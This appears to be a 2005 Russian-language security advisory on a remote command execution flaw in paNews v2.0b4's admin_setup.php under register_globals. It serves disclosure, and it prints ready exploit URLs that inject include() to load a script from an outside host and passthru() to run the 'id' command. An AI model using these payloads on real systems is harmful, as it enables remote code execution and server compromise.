Дата публикации: | 22.02.2005 |
Всего просмотров: | 997 |
Опасность: | |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Описание: | Уязвимость позволяет удаленному пользователю выполнить произвольные команды на уязвимой системе. Уязвимость существует при обработке некоторых параметров в сценарии admin_setup.php при опции register_globals=on в конфигурационном файле php.ini. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный php сценарий и произвольные команды на системе с привилегиями текущего web сервера. Примеры: PHP-инклюдинг
http://victim/panews/includes/admin_setup.php?access[]= admins&do=updatesets&form[comments]= $nst&form[autoapprove]=$nst&disvercheck= $nst&installed=$asd&showcopy=include($nst) http://victim/panews/includes/config.php?nst=http://your/file.php Выполнение команд
http://victim/panews/includes/admin_setup.php?access[]=admins& amp;do=updatesets&form[comments]=$nst&form[autoapprove]= $nst&disvercheck=$nst&installed=$asd&showcopy=passthru($nst) http://victim/panews/includes/config.php?nst=id Примечание: Для успешной реализации уязвимости необходимо отключить выполнение javscript сценариев в браузере. URL производителя: http://www.phparena.net/panews.php Решение: Способов устранения уязвимости не существует в настоящее время. |
Ссылки: | Arbitrary Command Execution in paNews v2.0b4 |